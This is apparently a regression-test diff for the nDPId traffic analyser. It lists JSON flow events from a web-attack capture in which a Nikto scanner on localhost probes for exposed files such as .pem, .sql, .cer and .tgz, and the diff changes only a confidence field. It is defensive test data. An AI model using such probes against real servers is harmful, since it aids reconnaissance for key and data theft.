-01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277074,"pkt":"AAAAAAAAAAAAAAAACABFAADDdgpAAEAGxih\/AAABfwAAAcOQH5DZ8k59fiDl9oAYAED+twAAAQEICp1m\/HqdZvx6R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277075,"pkt":"AAAAAAAAAAAAAAAACABFAAC9f6pAAEAGvI5\/AAABfwAAAcOSH5AexUfewusNb4AYAED+sQAAAQEICp1m\/HudZvx7R0VUIC8xLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277077,"pkt":"AAAAAAAAAAAAAAAACABFAAC9i6BAAEAGsJh\/AAABfwAAAcOUH5B4uLPsGcILh4AYAED+sQAAAQEICp1m\/H2dZvx9R0VUIC8xLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277078,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VOpAAEAG505\/AAABfwAAAcOWH5Crf2yePds4BoAYAED+sQAAAQEICp1m\/H6dZvx+R0VUIC8xLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277079,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DWxAAEAGLs1\/AAABfwAAAcOYH5CSvzUdCWfTlYAYAED+sQAAAQEICp1m\/H+dZvx\/R0VUIC8xLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277081,"pkt":"AAAAAAAAAAAAAAAACABFAADDZbZAAEAG1nx\/AAABfwAAAcOaH5Ap5V3Dc4s2n4AYAED+twAAAQEICp1m\/IGdZvyBR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277083,"pkt":"AAAAAAAAAAAAAAAACABFAADDEYFAAEAGKrJ\/AAABfwAAAcOcH5DxxikK7qXr+IAYAED+twAAAQEICp1m\/IOdZvyCR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
